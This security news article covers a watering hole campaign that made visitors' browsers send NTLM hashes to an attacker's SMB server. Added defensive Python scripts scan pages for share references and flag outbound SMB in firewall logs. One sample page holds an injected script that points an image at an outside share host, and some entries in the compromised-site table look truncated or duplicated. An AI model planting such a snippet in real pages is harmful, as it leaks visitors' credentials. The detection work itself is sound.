Researchers Uncover Major Watering Hole Campaign Targeting Multiple Sectors

essidsolutions

Unidentified hackers have been targeting visitors of several Ukrainian and Canadian websites with watering hole attacks, Lumen Technologies-owned Black Lotus Labs has revealed. Sectors affected by the campaign include manufacturing, oil, media, sport, and investment banking. Here’s what organizations should do to mitigate the threat from watering hole attacks.

Security firm Black Lotus Labs recently unearthed a watering hole campaign targeting several Ukrainian websites and a Canadian website. The firm believes the campaign is the work of the same threat actors who compromised San Francisco International Airport’s website back in April 2020.

In a watering hole attack, attackers compromise websites that enjoy sizable Internet traffic and use them to target the individuals who regularly visit those sites. Such attacks generally require the attackers to research their intended victims’ online browsing patterns beforehand.

This attack vector derives its name from predators lurking around watering holes in the wild, waiting to attack unsuspecting prey. Like those predators, cyber threat actors lurk in the background, looking to pounce as soon as a target visits the watering hole (in this case, a website).

Watering hole attacks can prove quite dangerous because not only individuals or organizations but entire sectors and industries can be targeted. The UK’s National Cyber Security Centre notes, “The malware may be delivered and installed without the target realising (called a ‘drive by’ attack), but given the trust the target is likely to have in the watering hole site, it can also be a file that a user will consciously download without realising what it really contains.”


[Figure: Watering Hole Attack Pattern | Source: UK NCSC]

So far, sectors affected by the campaign include manufacturing, oil, media, sport, and investment banking. The attackers, who remain unidentified as of now, injected malicious JavaScript code that “prompted the victims’ devices to send their New Technology LAN Manager (NTLM) hashes to an actor-controlled server using Server Message Block (SMB).”

NTLM is an authentication protocol used on networks that include systems running the Windows operating system, as well as on stand-alone systems. SMB is the network file-sharing protocol that provides an inter-process communication mechanism for shared access to files, printers, and serial ports between network nodes; when a Windows client connects to an SMB server, it authenticates using NTLM, which is what allows an attacker-controlled server to collect the hashes.

NTLM credentials usually consist of a domain name, a user name, and a one-way hash of the user’s password obtained during the interactive logon process. If the attackers can break these hashes, they can access users’ email credentials, credentials associated with other accounts, personal or financial information, and corporate resources, if any. 

Moreover, victims are also at risk of being impersonated, since the theft exposes their Windows authentication credentials and not just usernames and passwords.
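The article recommends tracking frequently visited sites for malware; the following Python script, added here as an example and not taken from the article or from Black Lotus Labs’ report, shows what such a check can look like for the technique described above. It parses a page’s HTML and flags every resource attribute or inline script that references an SMB/UNC share host (file://, file:\\, smb:// or a bare \\host\share path), then classifies each host as allowlisted, internal (RFC 1918, loopback or link-local) or external. The sample page, the allowlist and the internal address ranges are constructed assumptions for the example; 203.0.113.7 is a documentation address standing in for a public IP.

```python
import ipaddress
import re
from html.parser import HTMLParser

# Attributes whose value the browser fetches or follows while rendering the page.
RESOURCE_ATTRS = {"src", "href", "data", "action", "poster", "content"}

# Address ranges treated as "inside the network" for this check (RFC 1918 plus
# loopback and link-local). Anything else is considered external. (Assumption.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# A reference that resolves to a Windows file share instead of a web origin:
# file://host/..., file:\\host\..., smb://host/... or a bare \\host\... UNC path.
SMB_REF_RE = re.compile(
    r"(?<![\\\w])"                           # not inside a word or a longer run of backslashes
    r"(?:file:(?://|\\{2,})|smb://|\\{2,})"  # scheme or UNC prefix (\\{2,} also covers JS-escaped \\\\)
    r"([A-Za-z0-9][A-Za-z0-9_.\-]*)"         # host name or IP address (captured)
    r"(?=[\\/]|$)",                          # followed by a path separator or end of text
    re.I,
)


def classify_host(host, allowlist=()):
    """Return 'allowlisted', 'internal' or 'external' for a share host."""
    if host.lower() in {h.lower() for h in allowlist}:
        return "allowlisted"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"  # a host name that is not on the allowlist is untrusted
    return "internal" if any(ip in net for net in INTERNAL_NETS) else "external"


class ShareReferenceFinder(HTMLParser):
    """Collect every attribute value or inline script that references a file share."""

    def __init__(self):
        super().__init__()
        self.hits = []          # (tag, host) pairs in document order
        self._script = None     # buffer for the inline <script> currently being read

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in RESOURCE_ATTRS and value:
                self.hits.extend((tag, h) for h in SMB_REF_RE.findall(value))
        if tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.hits.extend(("script", h) for h in SMB_REF_RE.findall("".join(self._script)))
            self._script = None


def scan_page(html, allowlist=()):
    """Return [{'tag', 'host', 'verdict'}] for every share reference found in the page."""
    finder = ShareReferenceFinder()
    finder.feed(html)
    finder.close()
    return [{"tag": tag, "host": host, "verdict": classify_host(host, allowlist)}
            for tag, host in finder.hits]


def external_share_hosts(html, allowlist=()):
    """Share hosts outside the organization that a visitor's browser would be asked to reach."""
    return sorted({f["host"] for f in scan_page(html, allowlist) if f["verdict"] == "external"})


# Constructed sample page: one legitimate intranet share reference and one
# injected inline script that points visitors at a share on an outside host.
SAMPLE_HTML = r"""<html><head>
<link rel="stylesheet" href="/static/site.css">
<script src="https://cdn.example.net/lib.js"></script>
<script>
var i = new Image();
i.src = "\\\\203.0.113.7\\share\\pixel.png";
</script>
</head><body>
<img src="/img/logo.png">
<img src="file://fileserver.corp.example/public/banner.png">
</body></html>"""

if __name__ == "__main__":
    trusted = ("fileserver.corp.example",)   # assumed intranet file server
    for f in scan_page(SAMPLE_HTML, trusted):
        print(f"{f['verdict']:<12} <{f['tag']}> -> {f['host']}")
    print("external share hosts:", external_share_hosts(SAMPLE_HTML, trusted))
```

Run against a saved copy of a page (or the output of a periodic fetch of the sites employees visit most), the script reports the hosts that an unsuspecting visitor’s browser would attempt to authenticate to; any host that is neither allowlisted nor internal deserves a look at the page diff and the site owner.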


The compromised websites along with their corresponding dates of compromise are:

Compromised Websites

Website Type                                       Website                 Date of Compromise
Group 1: Manufacturing                             od[.]ua                 Oct. 15, 2020
                                                   vistec[.]ua             Sept. 23, 2020
                                                   com[.]ua                March 31, 2020
Group 2: A Football Club and an Investment Bank    kiev[.]ua               May 15, 2020
                                                   dragon-capital[.]com    Dec. 17, 2019
Group 3: Media Organizations                       zoomua[.]tv             May 18, 2019
                                                   com[.]ua                May 21, 2020
                                                   ntn[.]ua                March 3, 2019
Group 4: Oil Companies                             dtek[.]com              May 13, 2019
                                                   dtek[.]com              May 13, 2019
                                                   investecogas[.]com      Feb. 14, 2019


“We’re releasing our report on a series of watering hole style attacks targeting Ukrainian and Canadian organizations. This campaign harvested NTLM hashes of unwitting visitors. pic.twitter.com/jnhsAvOG42”

— Black Lotus Labs (@BlackLotusLabs) April 5, 2021

Operators of all compromised websites have been notified by Lumen Technologies.

Mitigations Against Watering Hole Attacks

According to network security company Lastline, “the problem with watering hole attacks is the difficulty in training employees to avoid infected sites. Organizations can train employees how to recognize and avoid most phishing emails, but there is no way for a user to identify a compromised website without the assistance of a tool specifically designed to do just that.”

Black Lotus Labs recommends that organizations take the following steps to mitigate the threat from watering hole attacks:

  • Prevent outbound SMB-based communications. This can be done through proper firewall configuration or by turning off SMB.
  • Disable the software and technologies that are targeted most often. For example, JavaScript can be disabled for untrusted sites using NoScript. If disabling is not an option, limit its use to only those websites that need it. Other frequently exploited software includes Adobe Flash and Internet Explorer; both were exploited to target Forbes.com in 2015.
  • Regularly update the system software.
  • Track frequently visited sites for malware.
  • Monitor traffic from third-party, unknown, and suspicious sites.
  • Ensure that the organization’s online activities and network traffic are not visible to the outside world.
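The first and fifth recommendations (block outbound SMB, monitor traffic to unknown sites) can be checked against firewall logs. The following Python script is an added example, not code from the article or from Black Lotus Labs: it parses a simplified, constructed firewall log format and reports every TCP connection to port 445 or 139 whose destination lies outside the internal address ranges, separating connections the firewall allowed (a gap in the egress policy) from those it blocked (the control working). The log format, the sample lines and the internal ranges are assumptions; 203.0.113.7 and 198.51.100.9 are documentation addresses standing in for public hosts.

```python
import ipaddress
import re
from collections import defaultdict

SMB_PORTS = {445, 139}   # direct SMB over TCP, and SMB over the NetBIOS session service

# Ranges regarded as inside the network for this check (RFC 1918 plus loopback
# and link-local); an SMB connection to any other destination is flagged. (Assumption.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

# Simplified, constructed firewall log format assumed by this example:
#   <timestamp> <ALLOW|BLOCK> <TCP|UDP> src=<ip>:<port> dst=<ip>:<port>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|BLOCK)\s+(?P<proto>TCP|UDP)\s+"
    r"src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)\s*$")


def is_internal(ip_text):
    """True when the address falls inside one of the internal ranges above."""
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def find_outbound_smb(lines):
    """Return one record per TCP connection to port 445/139 on a non-internal host."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # unparsable line: skipped here (a real pipeline would count these)
        dport = int(m["dport"])
        if m["proto"] != "TCP" or dport not in SMB_PORTS:
            continue
        if is_internal(m["dst"]):
            continue   # SMB to an internal file server is expected traffic
        findings.append({"ts": m["ts"], "action": m["action"], "src": m["src"],
                         "dst": m["dst"], "dport": dport})
    return findings


def hosts_that_reached_external_smb(findings):
    """Map each internal source to the external SMB hosts it was ALLOWED to connect to.

    An ALLOW means the egress filter the text recommends is missing or has a gap;
    BLOCK entries still deserve review (something on that host tried), but they
    show the control worked."""
    reached = defaultdict(set)
    for f in findings:
        if f["action"] == "ALLOW":
            reached[f["src"]].add(f["dst"])
    return {src: sorted(dsts) for src, dsts in reached.items()}


# Constructed sample log lines in the assumed format.
SAMPLE_LOG = [
    "2021-01-01T10:12:01Z ALLOW TCP src=10.20.3.15:51234 dst=10.20.1.5:445",     # internal file server
    "2021-01-01T10:12:07Z ALLOW TCP src=10.20.3.15:51240 dst=203.0.113.7:445",   # outbound SMB, allowed
    "2021-01-01T10:12:08Z ALLOW TCP src=10.20.3.15:51241 dst=203.0.113.7:443",   # ordinary HTTPS
    "2021-01-01T10:13:30Z BLOCK TCP src=10.20.3.22:49152 dst=198.51.100.9:445",  # attempt stopped by policy
    "2021-01-01T10:14:02Z ALLOW TCP src=10.20.3.31:49321 dst=203.0.113.7:139",   # NetBIOS session port
    "2021-01-01T10:14:05Z ALLOW UDP src=10.20.3.31:49322 dst=203.0.113.7:445",   # UDP/445 is not an SMB session; ignored
]

if __name__ == "__main__":
    found = find_outbound_smb(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['action']:<5} {f['src']} -> {f['dst']}:{f['dport']}")
    print("hosts that reached external SMB:", hosts_that_reached_external_smb(found))
```

In practice the regular expression is swapped for the parser of whatever log source is in use (firewall, NetFlow, proxy egress logs); the decision logic, flag any SMB session whose destination is not an internal address, stays the same, and the sources listed under ALLOW are the hosts whose NTLM hashes may already have left the network.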
